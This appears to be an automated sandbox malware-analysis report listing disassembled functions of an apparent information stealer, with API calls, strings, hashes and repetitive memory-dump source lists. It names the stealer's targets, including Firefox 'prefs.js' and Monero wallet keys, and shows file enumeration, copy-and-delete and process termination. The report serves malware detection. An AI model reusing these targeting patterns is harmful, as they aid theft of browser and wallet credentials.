                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: 164df83f295d82662260a4b0651f789a6bcf572806099b65e030dc926f4b3475
                              • Instruction ID: 353388fc4d95f62959ee1927b88b777321bc80fc78434b259810c7e6ce35c8ea
                              • Opcode Fuzzy Hash: 164df83f295d82662260a4b0651f789a6bcf572806099b65e030dc926f4b3475
                              • Instruction Fuzzy Hash: 2AE1CF729111289BDB58EB64DDA2EEE733DFF54310F4045D9B50AA2092EE306BC9CF52
                              Function 00850098 Relevance: 17.4, Strings: 13, Instructions: 1151COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                              • API String ID: 0-1562099544
                              • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                              • Instruction ID: 7241691a41ee4bbc9013d1c2a612ca2618a8e377c1aa3f76a28cd36702fff46b
                              • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                              • Instruction Fuzzy Hash: 8EE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                              Function 00C742CC Relevance: 16.6, Strings: 12, Instructions: 1642COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: #Iz$+cW~$Co$Gke$N~J+$Z=k7$vHW$vy|~$"{{$&w$m= $H
                              • API String ID: 0-1105423413
                              • Opcode ID: 9554bbda48d545cdc8c5e431877f426fc4a7899b8127161cc28312c11a4e9de7
                              • Instruction ID: 44df45b03a681307b58ffad3d9bea01c827b33e3a7071954bda4f57ea0dd79e9
                              • Opcode Fuzzy Hash: 9554bbda48d545cdc8c5e431877f426fc4a7899b8127161cc28312c11a4e9de7
                              • Instruction Fuzzy Hash: 4AB23AF390C2049FE3046E2DEC8566AFBE9EFD4760F1A853DEAC483744EA7558058693
                              Function 0081F7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008316B0,00830D97), ref: 0081F81E
                              • StrCmpCA.SHLWAPI(?,008316B4), ref: 0081F86F
                              • StrCmpCA.SHLWAPI(?,008316B8), ref: 0081F885
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0081FBB1
                              • FindClose.KERNEL32(000000FF), ref: 0081FBC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 3530e3f4454e609777fd1c42d774fdf3e258a05ed77c2b06335866ea24a3ba62
                              • Instruction ID: 6c6b9b62329cfff14bb075d32d6364878ce7546a4721ed2c300cbb4c3d53e7d4
                              • Opcode Fuzzy Hash: 3530e3f4454e609777fd1c42d774fdf3e258a05ed77c2b06335866ea24a3ba62
                              • Instruction Fuzzy Hash: 91B1F4719001289BCB28FF68ED96AED7779FF54300F4045A8E50AD6191EF315B89CB93
                              Function 00811710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0083523C,?,?,?,008352E4,?,?,00000000,?,00000000), ref: 00811963
                              • StrCmpCA.SHLWAPI(?,0083538C), ref: 008119B3
                              • StrCmpCA.SHLWAPI(?,00835434), ref: 008119C9
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00811D80
                              • DeleteFileA.KERNEL32(00000000), ref: 00811E0A
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00811E60
                              • FindClose.KERNEL32(000000FF), ref: 00811E72
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: e36d1492c99f5edb626b06a7fc865ee1c241f78ffcb212ced83a2105cb60e392
                              • Instruction ID: c42f01d8114da59818fa61dd3fdaebb0dec5744d1413d702166373145d87d04a
                              • Opcode Fuzzy Hash: e36d1492c99f5edb626b06a7fc865ee1c241f78ffcb212ced83a2105cb60e392
                              • Instruction Fuzzy Hash: AE12D0719101289BCB1DFB64ECA6AEE7379FF54310F4045D9A50AA6191EF306BC8CF92
                              Function 0081DF10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00830C32), ref: 0081DF5E
                              • StrCmpCA.SHLWAPI(?,008315C0), ref: 0081DFAE
                              • StrCmpCA.SHLWAPI(?,008315C4), ref: 0081DFC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0081E4E0
                              • FindClose.KERNEL32(000000FF), ref: 0081E4F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: 54d476eccf0ab9e0ca3e726395576e3f7931f6c77b75a759fda0639e693a109d
                              • Instruction ID: a8cd087a795fdafe24da1ee979fc19208cd03108e2a5337009c4c23ad9f14b60
                              • Opcode Fuzzy Hash: 54d476eccf0ab9e0ca3e726395576e3f7931f6c77b75a759fda0639e693a109d
                              • Instruction Fuzzy Hash: 59F1BC719141289BCB19EB64EDA6EEE7339FF54310F4045D9B41AA2091EF306BC9CF62
                              Function 0081DB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008315A8,00830BAF), ref: 0081DBEB
                              • StrCmpCA.SHLWAPI(?,008315AC), ref: 0081DC33
                              • StrCmpCA.SHLWAPI(?,008315B0), ref: 0081DC49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0081DECC
                              • FindClose.KERNEL32(000000FF), ref: 0081DEDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: ce2ec7e0f010d3180cdfda3f05e2e7ae4a9430b83bac2c893a68927013639b69
                              • Instruction ID: 929a9c04f333605b75e394bc31b1bfaf831768c6286b471d596903692e05cb3d
                              • Opcode Fuzzy Hash: ce2ec7e0f010d3180cdfda3f05e2e7ae4a9430b83bac2c893a68927013639b69
                              • Instruction Fuzzy Hash: 3091B172A002189BCB18FBB8ED969ED737DFF94340F004958E917D6141EA349B99CB93
                              Function 008298E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00829905
                              • Process32First.KERNEL32(00819FDE,00000128), ref: 00829919
                              • Process32Next.KERNEL32(00819FDE,00000128), ref: 0082992E
                              • StrCmpCA.SHLWAPI(?,00819FDE), ref: 00829943
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0082995C
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0082997A
                              • CloseHandle.KERNEL32(00000000), ref: 00829987
                              • CloseHandle.KERNEL32(00819FDE), ref: 00829993
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                              • String ID:
                              • API String ID: 2696918072-0
                              • Opcode ID: 4defb7367aaa046eb3831d8bf72bbd6792299ffe2bb9243638f2a442a9f6e1a1
                              • Instruction ID: e39ec4684b5076c8955d635c09703ec266f7b502fafb3b2b3eca83544e324365
                              • Opcode Fuzzy Hash: 4defb7367aaa046eb3831d8bf72bbd6792299ffe2bb9243638f2a442a9f6e1a1
                              • Instruction Fuzzy Hash: E011EF75904318ABDB24DFA4EC88BDDBB79BB48701F00459CF505AA250DB749A85CF90
                              Function 00C6A2F5 Relevance: 11.5, Strings: 8, Instructions: 1531COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ?1_$M~$OJU$ajwo$b1.{$uZ_<$HoHo$'o
                              • API String ID: 0-618255110
                              • Opcode ID: 2e6ffc22c31af7150347964a6bfd2e68f54224c85d6995820cbe5b9455bc8d4b
                              • Instruction ID: ec94b27d36a7aa82da5ed2554b7b829fb4aa56d3735caf96a8dfb7d0a66f4ee4
                              • Opcode Fuzzy Hash: 2e6ffc22c31af7150347964a6bfd2e68f54224c85d6995820cbe5b9455bc8d4b
                              • Instruction Fuzzy Hash: CEB2D1F260C600AFE3046E29EC8567AFBE5EF94720F1A493DE6C4C7744EA3598418797
                              Function 00827D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                              • GetKeyboardLayoutList.USER32(00000000,00000000,008305B7), ref: 00827D71
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00827D89
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00827D9D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00827DF2
                              • LocalFree.KERNEL32(00000000), ref: 00827EB2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
